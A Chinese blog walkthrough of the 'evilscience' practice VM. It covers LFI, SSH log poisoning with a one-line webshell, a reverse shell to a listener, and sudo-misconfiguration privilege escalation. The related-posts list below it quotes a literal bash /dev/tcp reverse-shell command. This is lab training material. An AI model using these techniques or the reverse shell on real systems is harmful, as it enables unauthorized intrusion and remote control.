靶机实战-evilscience

最新推荐文章于 2025-03-08 23:16:49 发布
最新推荐文章于 2025-03-08 23:16:49 发布
阅读量802 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43870289/article/details/104099568
版权

evilscience靶机实战

文章目录

1、主机发现

在这里插入图片描述
目标IP:192.168.232.164

2、端口扫描

在这里插入图片描述

3、端口详情扫描

在这里插入图片描述
22端口–ssh、80端口–http

4、访问80端口

浏览网站,寻找有价值的信息
发现该网站有可能存在LFI(本地文件包含)
在这里插入图片描述
在这里插入图片描述
在about.php页面看到一个邮箱,记下来
//wearethebody@theether.com
在这里插入图片描述
长生不老药?!牛啊
扫一下其它目录:
在这里插入图片描述
没发现可以利用的信息
那就利用文件包含试试
在这里插入图片描述
包含/etc/passwd,没有反应
bp抓包://扫描可包含的文件
在这里插入图片描述
添加字典://字典自己找
发现几个可包含文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
var/log/auth.log 发现回包是连接ssh的记录,我们可以利用ssh登录产生错误日志 //auth.log是记录ssh登录
在这里插入图片描述
在这里插入图片描述
可以看到错误信息写入到日志中,可以利用ssh错误日志写入一句话木马
在这里插入图片描述
测试一句话是否成功写入,下图可以看到成功执行,然后可以执行任何系统命令
在这里插入图片描述
反弹shell,需要对反弹shell进行url编码
在这里插入图片描述
在这里插入图片描述
kali开启监听://拿到shell
在这里插入图片描述
如果没有终端用python -c ,重新打开一个终端
在这里插入图片描述

5、提权

方法一

sudo -l查看是否属于sudo组
在这里插入图片描述
可以使用sudo权限不需要密码执行xxxlogauditorxxx.py,查看一下该文件的权限, 该py文件的配置错误,导致可以直接以root权限执行命令,查看脚本存在命令执行漏洞
在这里插入图片描述
msfvenom生成一个payload,上传到目标,增加执行权限
在这里插入图片描述

.elf文件是一种用于二进制文件、可执行文件、目标代码、共享库和核心转储格式文件

在这里插入图片描述
在这里插入图片描述
sudo运行该脚本://kali需提前开启监听
在这里插入图片描述
在这里插入图片描述
kali监听结果:
在这里插入图片描述
提权成功

方法二

首先给/etc/sudoers加写入权限
在这里插入图片描述
然后把当前用户以不用密码的登录方式添加到sudo组
在这里插入图片描述
sudo -i 获得root权限
在这里插入图片描述
提权成功

滕财然
关注
The Ether: Evil Science靶机渗透测试
weixin_58786230的博客
08-08 470
【代码】The Ether: Evil Science靶机渗透测试。
靶机实战-DC-6
滕财然的博客
03-03 925
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
kali渗透综合靶机(十六)--evilscience靶机
WY92139010的博客
06-13 441
kali渗透综合靶机(十六)--evilscience靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.195    三、端口服务识别 1. nmap -sV -T4 -O -p 22,80 192.168.1...
靶机Lampiao入侵实战
最新发布
没有网络安全就没有国家安全
03-08 948
靶机Lampiao入侵实战
靶机实战(billu)
weixin_45605313的博客
06-01 695
billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:billu 测试机:kali,win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
靶机实战-FristiLeaks
滕财然的博客
01-20 494
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 1032
SQL注入getshell靶机实战
靶机实战:Funbox10
CHAsichuan的博客
06-14 2341
一次中等难度的靶机超详细版记录
靶机实战-zico
滕财然的博客
01-19 1286
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到一个有用的: 链接后面有?page= tools.htm...
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
靶机实战-Acid
滕财然的博客
01-26 935
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
evilscience 靶机渗透
weixin_44769042的博客
10-30 585
目录 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 反弹shell 提权 提权成功,得到flag 总结 主机发现 这两个ip mac地址是一样的,随便用一个就行 端口扫描 服务版本,操作系统扫描 开始渗透 1> web端目录扫描 这个页面有个下载,但是没啥用 扫了一堆都没啥用 2> 主页找到一个类似文件包含的特征点 尝试包含一下/etc/passwd,,结果没啥用 3> 用字典跑一下包含目录 找到几个...
靶机实战-blogger
ST0new的博客
04-05 4100
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3383
Vulnhub-CTF4靶机实战
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 6392
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 894
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
靶机实战-peixun-sever
滕财然的博客
01-25 432
peixun-sever靶机实战 文章目录peixun-sever靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问http服务(80端口)5、提权 1、主机发现 目标IP:192.168.232.135 2、端口扫描 开放22、80、8080端口 3、端口详细信息扫描 4、访问http服务(80端口) 熟悉的id=…试试有没有SQL注入 说明存在SQL注入,尝试SQL注入:...
vulnhub靶机AI-WEB1
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值